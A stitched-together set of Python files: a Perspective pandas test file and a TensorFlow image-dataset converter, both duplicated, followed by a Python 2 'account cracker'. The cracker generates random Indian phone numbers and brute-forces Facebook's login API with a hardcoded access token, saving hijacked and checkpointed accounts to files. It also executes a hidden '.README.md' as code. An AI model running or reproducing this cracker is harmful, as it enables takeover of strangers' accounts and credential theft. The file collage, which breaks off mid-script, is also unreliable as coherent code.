dat['Ship Date'] = fake.date_between_dates(dat['Order Date']).strftime('%Y-%m-%d')
dat['Order Date'] = dat['Order Date'].strftime('%Y-%m-%d')
dat['Ship Mode'] = choice(['First Class', 'Standard Class', 'Second Class'])
dat['Ship Mode'] = choice(['First Class', 'Standard Class', 'Second Class'])
dat['Customer ID'] = fake.license_plate()
dat['Segment'] = choice(['A', 'B', 'C', 'D'])
dat['Country'] = 'US'
dat['City'] = fake.city()
dat['State'] = fake.state()
dat['Postal Code'] = fake.zipcode()
dat['Region'] = choice(['Region %d' % i for i in range(5)])
dat['Product ID'] = fake.bban()
sector = choice(['Industrials', 'Technology', 'Financials'])
industry = choice(['A', 'B', 'C'])
dat['Category'] = sector
dat['Sub-Category'] = industry
dat['Sales'] = randint(1, 100) * 100
dat['Quantity'] = randint(1, 100) * 10
dat['Discount'] = round(random() * 100, 2)
dat['Profit'] = round(random() * 1000, 2)
data.append(dat)
return pd.DataFrame(data)
class TestTableNumpy(object):
def test_empty_table(self):
tbl = Table([])
assert tbl.size() == 0
def test_table_dataframe(self):
import pandas as pd
data = pd.DataFrame([{"a": 1, "b": 2}, {"a": 3, "b": 4}])
tbl = Table(data)
assert tbl.size() == 2
def test_table_series(self):
import pandas as pd
data = pd.Series([1, 2, 3], name="a")
tbl = Table(data)
assert tbl.size() == 3
def test_rowpivots(self):
# basic
df = superstore()
df_pivoted = df.set_index(['Country', 'Region'])
table = Table(df_pivoted)
def test_pivottable(self):
df = superstore()
pt = pd.pivot_table(df, values='Discount', index=['Country', 'Region'], columns='Category')
table = Table(pt)
def test_colpivots(self):
arrays = [np.array(['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz', 'foo', 'foo', 'foo', 'foo', 'qux', 'qux', 'qux', 'qux']),
np.array(['one', 'one', 'two', 'two', 'one', 'one', 'two', 'two', 'one', 'one', 'two', 'two', 'one', 'one', 'two', 'two']),
np.array(['X', 'Y', 'X', 'Y', 'X', 'Y', 'X', 'Y', 'X', 'Y', 'X', 'Y', 'X', 'Y', 'X', 'Y'])]
tuples = list(zip(*arrays))
index = pd.MultiIndex.from_tuples(tuples, names=['first', 'second', 'third'])
df_both = pd.DataFrame(np.random.randn(3, 16), index=['A', 'B', 'C'], columns=index)
table = Table(df_both) | python/perspective/perspective/tests/table/test_table_pandas.py |
import numpy as np
from perspective.table import Table
from random import random, randint, choice
from faker import Faker
import pandas as pd
fake = Faker()
def superstore(count=10):
data = []
for id in range(count):
dat = {}
dat['Row ID'] = id
dat['Order ID'] = fake.ein()
dat['Order Date'] = fake.date_this_year()
dat['Ship Date'] = fake.date_between_dates(dat['Order Date']).strftime('%Y-%m-%d')
dat['Order Date'] = dat['Order Date'].strftime('%Y-%m-%d')
dat['Ship Mode'] = choice(['First Class', 'Standard Class', 'Second Class'])
dat['Ship Mode'] = choice(['First Class', 'Standard Class', 'Second Class'])
dat['Customer ID'] = fake.license_plate()
dat['Segment'] = choice(['A', 'B', 'C', 'D'])
dat['Country'] = 'US'
dat['City'] = fake.city()
dat['State'] = fake.state()
dat['Postal Code'] = fake.zipcode()
dat['Region'] = choice(['Region %d' % i for i in range(5)])
dat['Product ID'] = fake.bban()
sector = choice(['Industrials', 'Technology', 'Financials'])
industry = choice(['A', 'B', 'C'])
dat['Category'] = sector
dat['Sub-Category'] = industry
dat['Sales'] = randint(1, 100) * 100
dat['Quantity'] = randint(1, 100) * 10
dat['Discount'] = round(random() * 100, 2)
dat['Profit'] = round(random() * 1000, 2)
data.append(dat)
return pd.DataFrame(data)
class TestTableNumpy(object):
def test_empty_table(self):
tbl = Table([])
assert tbl.size() == 0
def test_table_dataframe(self):
import pandas as pd
data = pd.DataFrame([{"a": 1, "b": 2}, {"a": 3, "b": 4}])
tbl = Table(data)
assert tbl.size() == 2
def test_table_series(self):
import pandas as pd
data = pd.Series([1, 2, 3], name="a")
tbl = Table(data)
assert tbl.size() == 3
def test_rowpivots(self):
# basic
df = superstore()
df_pivoted = df.set_index(['Country', 'Region'])
table = Table(df_pivoted)
def test_pivottable(self):
df = superstore()
pt = pd.pivot_table(df, values='Discount', index=['Country', 'Region'], columns='Category')
table = Table(pt)
def test_colpivots(self):
arrays = [np.array(['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz', 'foo', 'foo', 'foo', 'foo', 'qux', 'qux', 'qux', 'qux']),
np.array(['one', 'one', 'two', 'two', 'one', 'one', 'two', 'two', 'one', 'one', 'two', 'two', 'one', 'one', 'two', 'two']),
np.array(['X', 'Y', 'X', 'Y', 'X', 'Y', 'X', 'Y', 'X', 'Y', 'X', 'Y', 'X', 'Y', 'X', 'Y'])]
tuples = list(zip(*arrays))
index = pd.MultiIndex.from_tuples(tuples, names=['first', 'second', 'third'])
df_both = pd.DataFrame(np.random.randn(3, 16), index=['A', 'B', 'C'], columns=index)
table = Table(df_both) | 0.428473 | 0.313197 |
import math
import collections
import hashlib
import os.path
import re
import sys
import tensorflow as tf
import dataset_utils
from download_and_convert_flowers import ImageReader
from local_dataset import get_dataset_filename, NUM_SHARDS
MAX_NUM_IMAGES_PER_CLASS = 2 ** 27 - 1 # ~134M
LABELS_FILENAME = 'labels.txt'
def create_image_lists(image_dir, testing_percentage=10, validation_percentage=10):
"""Builds a list of training images from the file system.
Analyzes the sub folders in the image directory, splits them into stable
training, testing, and validation sets, and returns a data structure
describing the lists of images for each label and their paths.
Args:
image_dir: String path to a folder containing subfolders of images.
testing_percentage: Integer percentage of the images to reserve for tests.
validation_percentage: Integer percentage of images reserved for validation.
Returns:
An OrderedDict containing an entry for each label subfolder, with images
split into training, testing, and validation sets within each label.
The order of items defines the class indices.
"""
if not tf.gfile.Exists(image_dir):
tf.logging.error("Image directory '" + image_dir + "' not found.")
return None
result = collections.OrderedDict()
sub_dirs = sorted(x[0] for x in tf.gfile.Walk(image_dir))
# The root directory comes first, so skip it.
is_root_dir = True
for sub_dir in sub_dirs:
if is_root_dir:
is_root_dir = False
continue
extensions = sorted(set(os.path.normcase(ext) # Smash case on Windows.
for ext in ['JPEG', 'JPG', 'jpeg', 'jpg', 'png']))
file_list = []
dir_name = os.path.basename(
# tf.gfile.Walk() returns sub-directory with trailing '/' when it is in
# Google Cloud Storage, which confuses os.path.basename().
sub_dir[:-1] if sub_dir.endswith('/') else sub_dir)
if dir_name == image_dir:
continue
tf.logging.info("Looking for images in '" + dir_name + "'")
for extension in extensions:
file_glob = os.path.join(image_dir, dir_name, '*.' + extension)
file_list.extend(tf.gfile.Glob(file_glob))
if not file_list:
tf.logging.warning('No files found')
continue
if len(file_list) < 20:
tf.logging.warning(
'WARNING: Folder has less than 20 images, which may cause issues.')
elif len(file_list) > MAX_NUM_IMAGES_PER_CLASS:
tf.logging.warning(
'WARNING: Folder {} has more than {} images. Some images will '
'never be selected.'.format(dir_name, MAX_NUM_IMAGES_PER_CLASS))
label_name = re.sub(r'[^a-z0-9]+', ' ', dir_name.lower())
training_images = []
testing_images = []
validation_images = []
for file_name in file_list:
base_name = os.path.basename(file_name)
# We want to ignore anything after '_nohash_' in the file name when
# deciding which set to put an image in, the data set creator has a way of
# grouping photos that are close variations of each other. For example
# this is used in the plant disease data set to group multiple pictures of
# the same leaf.
hash_name = re.sub(r'_nohash_.*$', '', file_name)
# This looks a bit magical, but we need to decide whether this file should
# go into the training, testing, or validation sets, and we want to keep
# existing files in the same set even if more files are subsequently
# added.
# To do that, we need a stable way of deciding based on just the file name
# itself, so we do a hash of that and then use that to generate a
# probability value that we use to assign it.
hash_name_hashed = hashlib.sha1(
tf.compat.as_bytes(hash_name)).hexdigest()
percentage_hash = ((int(hash_name_hashed, 16) %
(MAX_NUM_IMAGES_PER_CLASS + 1)) *
(100.0 / MAX_NUM_IMAGES_PER_CLASS))
if percentage_hash < validation_percentage:
validation_images.append(base_name)
elif percentage_hash < (testing_percentage + validation_percentage):
testing_images.append(base_name)
else:
training_images.append(base_name)
result[label_name] = {
'dir': dir_name,
'training': training_images,
'testing': testing_images,
'validation': validation_images,
}
return result
def convert_dataset(split_name, filenames, class_names_to_ids, dataset_dir):
"""Converts the given filenames to a TFRecord dataset.
Args:
split_name: The name of the dataset, either 'train' or 'validation'.
filenames: A list of absolute paths to png or jpg images.
class_names_to_ids: A dictionary from class names (strings) to ids
(integers).
dataset_dir: The directory where the converted datasets are stored.
"""
assert split_name in ['train', 'validation']
num_per_shard = int(math.ceil(len(filenames) / float(NUM_SHARDS)))
with tf.Graph().as_default():
image_reader = ImageReader()
with tf.Session('') as sess:
for shard_id in range(NUM_SHARDS):
output_filename = get_dataset_filename(
dataset_dir, split_name, shard_id)
with tf.python_io.TFRecordWriter(output_filename) as tfrecord_writer:
start_ndx = shard_id * num_per_shard
end_ndx = min((shard_id+1) * num_per_shard, len(filenames))
for i in range(start_ndx, end_ndx):
sys.stdout.write('\r>> Converting image %d/%d shard %d' % (
i+1, len(filenames), shard_id))
sys.stdout.flush()
# Read the filename:
image_data = tf.gfile.GFile(filenames[i], 'rb').read()
height, width = image_reader.read_image_dims(
sess, image_data)
class_name = os.path.basename(
os.path.dirname(filenames[i]))
class_id = class_names_to_ids[class_name]
example = dataset_utils.image_to_tfexample(
image_data, b'jpg', height, width, class_id)
tfrecord_writer.write(example.SerializeToString())
sys.stdout.write('\n')
sys.stdout.flush() | research/slim/datasets/convert_utils.py |
import math
import collections
import hashlib
import os.path
import re
import sys
import tensorflow as tf
import dataset_utils
from download_and_convert_flowers import ImageReader
from local_dataset import get_dataset_filename, NUM_SHARDS
MAX_NUM_IMAGES_PER_CLASS = 2 ** 27 - 1 # ~134M
LABELS_FILENAME = 'labels.txt'
def create_image_lists(image_dir, testing_percentage=10, validation_percentage=10):
"""Builds a list of training images from the file system.
Analyzes the sub folders in the image directory, splits them into stable
training, testing, and validation sets, and returns a data structure
describing the lists of images for each label and their paths.
Args:
image_dir: String path to a folder containing subfolders of images.
testing_percentage: Integer percentage of the images to reserve for tests.
validation_percentage: Integer percentage of images reserved for validation.
Returns:
An OrderedDict containing an entry for each label subfolder, with images
split into training, testing, and validation sets within each label.
The order of items defines the class indices.
"""
if not tf.gfile.Exists(image_dir):
tf.logging.error("Image directory '" + image_dir + "' not found.")
return None
result = collections.OrderedDict()
sub_dirs = sorted(x[0] for x in tf.gfile.Walk(image_dir))
# The root directory comes first, so skip it.
is_root_dir = True
for sub_dir in sub_dirs:
if is_root_dir:
is_root_dir = False
continue
extensions = sorted(set(os.path.normcase(ext) # Smash case on Windows.
for ext in ['JPEG', 'JPG', 'jpeg', 'jpg', 'png']))
file_list = []
dir_name = os.path.basename(
# tf.gfile.Walk() returns sub-directory with trailing '/' when it is in
# Google Cloud Storage, which confuses os.path.basename().
sub_dir[:-1] if sub_dir.endswith('/') else sub_dir)
if dir_name == image_dir:
continue
tf.logging.info("Looking for images in '" + dir_name + "'")
for extension in extensions:
file_glob = os.path.join(image_dir, dir_name, '*.' + extension)
file_list.extend(tf.gfile.Glob(file_glob))
if not file_list:
tf.logging.warning('No files found')
continue
if len(file_list) < 20:
tf.logging.warning(
'WARNING: Folder has less than 20 images, which may cause issues.')
elif len(file_list) > MAX_NUM_IMAGES_PER_CLASS:
tf.logging.warning(
'WARNING: Folder {} has more than {} images. Some images will '
'never be selected.'.format(dir_name, MAX_NUM_IMAGES_PER_CLASS))
label_name = re.sub(r'[^a-z0-9]+', ' ', dir_name.lower())
training_images = []
testing_images = []
validation_images = []
for file_name in file_list:
base_name = os.path.basename(file_name)
# We want to ignore anything after '_nohash_' in the file name when
# deciding which set to put an image in, the data set creator has a way of
# grouping photos that are close variations of each other. For example
# this is used in the plant disease data set to group multiple pictures of
# the same leaf.
hash_name = re.sub(r'_nohash_.*$', '', file_name)
# This looks a bit magical, but we need to decide whether this file should
# go into the training, testing, or validation sets, and we want to keep
# existing files in the same set even if more files are subsequently
# added.
# To do that, we need a stable way of deciding based on just the file name
# itself, so we do a hash of that and then use that to generate a
# probability value that we use to assign it.
hash_name_hashed = hashlib.sha1(
tf.compat.as_bytes(hash_name)).hexdigest()
percentage_hash = ((int(hash_name_hashed, 16) %
(MAX_NUM_IMAGES_PER_CLASS + 1)) *
(100.0 / MAX_NUM_IMAGES_PER_CLASS))
if percentage_hash < validation_percentage:
validation_images.append(base_name)
elif percentage_hash < (testing_percentage + validation_percentage):
testing_images.append(base_name)
else:
training_images.append(base_name)
result[label_name] = {
'dir': dir_name,
'training': training_images,
'testing': testing_images,
'validation': validation_images,
}
return result
def convert_dataset(split_name, filenames, class_names_to_ids, dataset_dir):
"""Converts the given filenames to a TFRecord dataset.
Args:
split_name: The name of the dataset, either 'train' or 'validation'.
filenames: A list of absolute paths to png or jpg images.
class_names_to_ids: A dictionary from class names (strings) to ids
(integers).
dataset_dir: The directory where the converted datasets are stored.
"""
assert split_name in ['train', 'validation']
num_per_shard = int(math.ceil(len(filenames) / float(NUM_SHARDS)))
with tf.Graph().as_default():
image_reader = ImageReader()
with tf.Session('') as sess:
for shard_id in range(NUM_SHARDS):
output_filename = get_dataset_filename(
dataset_dir, split_name, shard_id)
with tf.python_io.TFRecordWriter(output_filename) as tfrecord_writer:
start_ndx = shard_id * num_per_shard
end_ndx = min((shard_id+1) * num_per_shard, len(filenames))
for i in range(start_ndx, end_ndx):
sys.stdout.write('\r>> Converting image %d/%d shard %d' % (
i+1, len(filenames), shard_id))
sys.stdout.flush()
# Read the filename:
image_data = tf.gfile.GFile(filenames[i], 'rb').read()
height, width = image_reader.read_image_dims(
sess, image_data)
class_name = os.path.basename(
os.path.dirname(filenames[i]))
class_id = class_names_to_ids[class_name]
example = dataset_utils.image_to_tfexample(
image_data, b'jpg', height, width, class_id)
tfrecord_writer.write(example.SerializeToString())
sys.stdout.write('\n')
sys.stdout.flush() | 0.605333 | 0.424591 |
import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, getpass
os.system('rm -rf .txt')
for n in range(98969):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print nmbr
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install requests')
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
time.sleep(1)
os.system('python2 .README.md')
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('user-agent', 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def exb():
print '[!] Exit'
os.sys.exit()
def psb(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(3.0 / 200)
def t():
time.sleep(1)
def cb():
os.system('clear')
logo = "\n\x1b[1;91m ______ \x1b[1;95m _____ __ __)\x1b[1;92m ______\n \x1b[1;91m (, / )\x1b[1;97m (, / (, /| / \x1b[1;92m (, / )\n \x1b[1;91m /---( \x1b[1;93m / / | / \x1b[1;92m / /\n\x1b[1;91m ) / ____)\x1b[1;94m___/__ ) / |/ \x1b[1;92m _/___ /_\n\x1b[1;91m(_/ ( (__\x1b[1;96m / (_/ ' \x1b[1;92m (_/___ / \n\x1b[1;90m AUTOMATIC ACCOUNT CRACKER BY \x1b[1;96mBOTOL BABA\n\x1b[1;97m--------------------------------------------------\n\x1b[1;95m\n AUTHOR : <NAME>\n FACEBOOK : FACEBOOK.COM/THEMEHTAN\n YOUTUBE : YOUTUBE.COM/MASTERTRICK1\n GITHUB : GITHUB.COM/BOTOLMEHEDI\n\x1b[1;32m\n--------------------------------------------------\n "
back = 0
successful = []
cpb = []
oks = []
id = []
def babaindseven():
os.system('clear')
print logo
print 'CRACK ONLY 7 DIGITS HACKABLE ACCOUNTS'
print
jalan('\x1b[1;91m [1] \x1b[1;93mSTART CRACK')
print
jalan('\x1b[1;92m [2] UPDATE TOOL')
print
jalan('\x1b[1;96m [3] BACK TO HOME')
print
jalan('\x1b[1;97m [0] EXIT')
print 50 * '-'
action()
def action():
global cpb
global oks
bch = raw_input('\n ===> ')
if bch == '':
print '[!] Fill in correctly'
action()
elif bch == '1':
os.system('clear')
print logo
print
try:
c = raw_input('TYPE ANY 3 DIGIT NUMBER \n\n \x1b[1;93m TYPE ANY CODE FROM 954 TO 997 : ')
k = '+91'
idlist = '.txt'
for line in open(idlist, 'r').readlines():
id.append(line.strip())
except IOError:
print '[!] File Not Found'
raw_input('\n[ Back ]')
babaindseven()
elif bch == '2':
os.system('clear')
os.system('pip2 install --upgrade babaindseven')
os.system('clear')
print logo
print
psb('7 DIGIT INDIAN CRACKER UPDATED SUCCESSFULLY')
time.sleep(2)
os.system('python2 .README.md')
elif bch == '3':
os.system('python2 .README.md')
elif bch == '0':
exb()
else:
print '[!] Fill in correctly'
action()
xxx = str(len(id))
psb('[\xe2\x9c\x93] TOTAL NUMBERS: ' + xxx)
time.sleep(0.5)
psb('[\xe2\x9c\x93] PLEASE WAIT, PROCESS IS RUNNING ...')
time.sleep(0.5)
psb('[!] TO STOP THIS PROCESS PRESS Ctrl THEN z')
time.sleep(0.5)
print 50 * '-'
print
def main(arg):
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = <PASSWORD>
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass1 + '\n')
okb.close()
oks.append(c + user + pass1)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass1 + '\n')
cps.close()
cpb.append(c + user + pass1)
else:
pass2 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=<PASSWORD>&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass2 + '\n')
okb.close()
oks.append(c + user + pass2)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass2 + '\n')
cps.close()
cpb.append(c + user + pass2)
else:
pass3 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass3 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass3 + '\n')
okb.close()
oks.append(c + user + pass3)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass3 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass3 + '\n')
cps.close()
cpb.append(c + user + pass3)
else:
pass4 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass4 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass4 + '\n')
okb.close()
oks.append(c + user + pass4)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass4 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass4 + '\n')
cps.close()
cpb.append(c + user + pass4)
pass5 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass5 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass5 + '\n')
okb.close()
oks.append(c + user + pass5)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass5 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass5 + '\n')
cps.close()
cpb.append(c + user + pass5)
else:
pass6 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass6 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass6 + '\n')
okb.close()
oks.append(c + user + pass6)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass6 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass6 + '\n')
cps.close()
cpb.append(c + user + pass6)
else:
pass7 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass7 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass7 + '\n')
okb.close()
oks.append(c + user + pass7)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass7 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass7 + '\n')
cps.close()
cpb.append(c + user + pass7)
else:
pass8 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass8 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass8 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass8 + '\n')
okb.close()
oks.append(c + user + pass8)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass8 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass8 + '\n')
cps.close()
cpb.append(c + user + pass8)
pass9 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>9 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass9 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass9 + '\n')
okb.close()
oks.append(c + user + pass9)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass9 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass9 + '\n')
cps.close()
cpb.append(c + user + pass9)
else:
pass10 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass10 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass10 + '\n')
okb.close()
oks.append(c + user + pass10)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass10 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass10 + '\n')
cps.close()
cpb.append(c + user + pass10)
else:
pass11 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=<PASSWORD>&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass11 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass11 + '\n')
okb.close()
oks.append(c + user + pass11)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass11 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass11 + '\n')
cps.close()
cpb.append(c + user + pass11)
else:
pass12 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass12 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass12 + '\n')
okb.close()
oks.append(c + user + pass12)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass12 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass12 + '\n')
cps.close()
cpb.append(c + user + pass12)
pass13 = '<PASSWORD>'
